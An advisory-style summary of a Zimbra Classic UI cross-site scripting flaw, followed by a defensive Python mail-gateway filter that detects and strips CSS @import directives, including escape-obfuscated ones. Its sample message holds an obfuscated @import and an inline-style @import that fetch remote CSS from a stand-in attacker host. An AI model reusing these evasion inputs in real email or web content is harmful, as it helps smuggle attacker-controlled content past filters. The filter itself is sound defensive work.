CVE-2025-66376 is a stored/reflected cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite (ZCS) Classic UI that is being actively exploited by a Russian APT in spear-phishing campaigns against Ukrainian organizations; CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog with a federal remediation deadline of April 1, 2026. A crafted HTML email is sufficient on its own: no additional vulnerability is needed, only that the victim preview the message in the Classic UI, after which the injected script can steal session tokens and harvest credentials. Organizations running ZCS 10 prior to 10.0.18 should patch immediately, or move affected users to the Modern UI as an interim mitigation, and should configure their email gateway to strip or sandbox CSS @import directives in inbound HTML mail.
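The gateway mitigation in the last sentence, as an added example that is not part of the original advisory or of Zimbra's own tooling: a Python content filter that finds CSS @import directives in the HTML parts of a MIME message, including ones hidden behind HTML entity or CSS hex escapes, and strips the containing `<style>` element or `style` attribute. The sample message, the `attacker.invalid` host and the helper names are constructed for this example; nothing here reproduces the actual exploit payload, which the page does not describe.

```python
"""Gateway-side filter: detect and strip CSS @import in HTML e-mail parts (constructed example)."""
import email
import html
import re
from dataclasses import dataclass, field
from email import policy
from email.message import EmailMessage

# CSS escape: backslash + 1..6 hex digits (+ one optional whitespace), or backslash + any char.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)", re.DOTALL)
# CSS at-keywords are case-insensitive; \b stops "@importer" from matching.
_AT_IMPORT = re.compile(r"@import\b", re.IGNORECASE)
_STYLE_ELEMENT = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.IGNORECASE | re.DOTALL)
_STYLE_ATTR = re.compile(r"""\sstyle\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def _unescape_css(text):
    def repl(m):
        if m.group(1) is not None:
            code = int(m.group(1), 16)
            return chr(code) if 0 < code <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return _CSS_ESCAPE.sub(repl, text)


def normalize_css(text):
    """Undo HTML entity and CSS escape encodings so an obfuscated @import becomes literal."""
    return _unescape_css(html.unescape(text))


def contains_css_import(css):
    return _AT_IMPORT.search(normalize_css(css)) is not None


def find_css_imports(html_body):
    """Return the raw <style> bodies and style attribute values that carry an @import."""
    hits = []
    for m in _STYLE_ELEMENT.finditer(html_body):
        if contains_css_import(m.group(1)):
            hits.append(m.group(1).strip())
    for m in _STYLE_ATTR.finditer(html_body):
        value = next(g for g in m.groups() if g is not None)
        if contains_css_import(value):  # at-rules are invalid here, but do not rely on the client rejecting them
            hits.append(value)
    # Deliberately over-broad fallback: @import outside a recognised container (e.g. an unclosed
    # <style> that a lenient client still parses) is still flagged, at the cost of some false positives.
    if not hits and contains_css_import(html_body):
        hits.append("<unrecognised container>")
    return hits


def strip_css_imports(html_body):
    """Drop every <style> element and style attribute whose CSS contains @import.
    The whole container goes, not just the one rule, so escape tricks cannot leave a
    fragment behind; losing the rest of that block's styling is the accepted cost."""
    def drop_style(m):
        return "<style></style>" if contains_css_import(m.group(1)) else m.group(0)

    def drop_attr(m):
        value = next(g for g in m.groups() if g is not None)
        return "" if contains_css_import(value) else m.group(0)

    return _STYLE_ATTR.sub(drop_attr, _STYLE_ELEMENT.sub(drop_style, html_body))


@dataclass
class ScanResult:
    flagged: bool
    findings: list = field(default_factory=list)
    message: EmailMessage = None


def scan_message(raw, rewrite=True):
    """Walk a raw RFC 5322 message; flag text/html parts with @import and optionally rewrite them."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()
        hits = find_css_imports(body)
        if hits:
            findings.extend(hits)
            if rewrite:  # set_content clears the old Content-* headers before re-encoding
                part.set_content(strip_css_imports(body), subtype="html")
    return ScanResult(bool(findings), findings, msg)


# Constructed sample: one @import hidden with a CSS hex escape (\69 == 'i'), one in an attribute.
SAMPLE_RAW = b"""\
From: sender@example.net
To: victim@example.org
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the HTML version.
--b1
Content-Type: text/html; charset="utf-8"

<html><head><style>
body { color: #333; }
@\\69mport url("https://attacker.invalid/x.css");
</style></head>
<body><div style="@import url(https://attacker.invalid/y.css)">Hello</div>
<p style="color:red">Legit inline style</p></body></html>
--b1--
"""

if __name__ == "__main__":
    result = scan_message(SAMPLE_RAW)
    print("flagged:", result.flagged, "findings:", result.findings)
    print(result.message.as_string())
```

In a deployment this sits behind a milter or the MTA's content filter and either quarantines the message or forwards the rewritten copy; the detection normalises HTML entities and CSS escapes before matching because the target client, not the gateway, decides how those are decoded.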